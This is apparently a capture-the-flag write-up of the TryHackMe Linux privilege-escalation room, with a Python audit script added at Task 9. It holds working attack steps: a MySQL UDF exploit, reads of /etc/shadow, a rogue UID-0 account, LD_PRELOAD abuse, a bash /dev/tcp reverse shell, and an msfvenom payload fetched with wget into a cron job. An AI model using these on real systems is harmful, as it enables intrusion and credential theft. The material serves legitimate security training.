This is the write-up for the room Linux PrivEsc on Tryhackme; it is part of the Complete Beginner path.
Connect to the Tryhackme lab environment with the VPN or use the attack box on the Tryhackme site.
Tasks Linux PrivEsc
Task 1
Deploy the machine attached to this room and connect to it with ssh user@<Machine_IP>
1.1 Run the “id” command. What is the result?
Type in the command
id
Answer: uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Task 2
Read all that is in the task. Basically, type in the following commands and understand the exploit
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
\q
rm /tmp/rootbash
exit
Task 3
3.1 What is the root user’s password hash?
Type in the following command
cat /etc/shadow
Answer: $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
3.2 What hashing algorithm was used to produce the root user’s password hash?
John should detect this automatically. You can also get it with the tool hash-identifier, or paste the hash into Hash Type Identifier – Identify unknown hashes.
Answer: sha512crypt
Note: hash-identifier did not get it right. I got it from Hash Type Identifier – Identify unknown hashes.
3.3 What is the root user’s password?
Save the hash in a file called hash.txt by typing in the following command
echo "$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0" > hash.txt
Now we are ready to crack the password with john. Type in the following command on your own Kali machine.
Task 4
Follow along with the task. Remember, the best editing tool is nano.
Task 5
5.1
Type in the following command to generate a password hash for the new password newpass
openssl passwd newpass
Now open /etc/passwd and add the generated hash to a new root-level user entry
5.1 Run the “id” command as the newroot user. What is the result?
Answer: uid=0(root) gid=0(root) groups=0(root)
Task 6
6.1 How many programs is “user” allowed to run via sudo?
Type in the following command to see a list of all programs
sudo -l
Answer: 11
6.2 One program on the list doesn’t have a shell escape sequence on GTFOBins. Which is it?
Answer: apache2
Task 7
Read all that is in the task and follow along
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so awk
Task 8
Read all that is in the task and press complete
nano /usr/local/bin/overwrite.sh
#!/bin/bash
bash -i >& /dev/tcp/YOUR_IP_HERE/4444 0>&1
On your Kali machine
nc -nvlp 4444
Task 9
9.1 What is the value of the PATH variable in /etc/crontab?
Type in the following command to create the overwrite.sh file
nano overwrite.sh
Add this to the file
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
Make the file executable
chmod +x /home/user/overwrite.sh
Wait 60 seconds, then type in
/tmp/rootbash -p
To get the answer to the question, type in
cat /etc/crontab
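As a defender's counterpart to the /etc/passwd edit in Task 5 and the cron PATH issue in this task, the following added Python check (not part of the room or this write-up) parses sample copies of /etc/passwd and /etc/crontab and flags extra UID-0 accounts, password hashes kept in passwd, and root cron jobs invoked by bare name through a PATH containing non-system directories. The file contents, the hash and the /home/user PATH entry are constructed for illustration.

```python
import re

# Constructed sample files standing in for /etc/passwd and /etc/crontab
# (not captured from the room machine).
PASSWD = """root:x:0:0:root:/root:/bin/bash
newroot:$1$xyz$CONSTRUCTEDHASH:0:0:root:/root:/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
"""
CRONTAB = """SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
"""

# Directories normally writable by root only; anything else in cron's PATH
# is a place where a user-controlled script of the same name could win.
TRUSTED_DIRS = {"/usr/local/sbin", "/usr/local/bin", "/usr/sbin",
                "/usr/bin", "/sbin", "/bin"}


def audit_passwd(text):
    """Flag non-root UID-0 accounts and password hashes stored in passwd."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"uid 0 account: {name}")
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append(f"hash in passwd: {name}")
    return findings


def audit_crontab(text):
    """Flag root jobs given by bare name when PATH has non-system dirs."""
    findings = []
    path_dirs = []
    for line in text.splitlines():
        m = re.match(r"^PATH=(.*)$", line)
        if m:
            path_dirs = m.group(1).split(":")
            continue
        parts = line.split()
        # System crontab format: five time fields, user, then the command.
        if len(parts) >= 7 and parts[5] == "root" and not parts[6].startswith("/"):
            untrusted = [d for d in path_dirs if d not in TRUSTED_DIRS]
            if untrusted:
                findings.append(f"{parts[6]} searched in {','.join(untrusted)}")
    return findings
```

Run the same two functions over the real files on a host you administer to confirm neither condition from the room is present.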
Task 10
Create the shell first
msfvenom -p linux/x64/shell_reverse_tcp LHOST=YOUR_KALI_IP_ADDRESS LPORT=4444 -f elf -o shell.elf
Now, in the same directory, start a web server
python3 -m http.server 80
Open a new terminal and start a listener by typing
nc -nlvp 4444
Go back to the machine of the room and type in
wget HTTP://<YOUR_KALI_IP>/shell.elf
chmod +x /home/user/shell.elf
Now wait until the cron job runs and a shell pops up in the listener
Task 11
Read all that is in the task and press complete
Task 12
Read all that is in the task and press complete
Task 13
Read all that is in the task and press complete
Task 14
Read all that is in the task and press complete
Task 15
Read all that is in the task and press complete
Task 16
16.1 What is the full mysql command the user executed?
Type in the following command to get the history of the user
cat .bash_history
Answer: mysql -h somehost.local -uroot -ppassword123
Task 17
17.1 What file did you find the root user’s credentials in?
If we type in ls, we see a file called myvpn.ovpn
cat myvpn.ovpn
Notice /etc/openvpn/auth.txt
cat /etc/openvpn/auth.txt
Answer: /etc/openvpn/auth.txt
Task 18
Read all that is in the task and press complete
Task 19
19.1 What is the name of the option that disables root squashing?
Answer: no_root_squash
Task 20
Read all that is in this task and press complete
Task 21
Read all that is in this task and press complete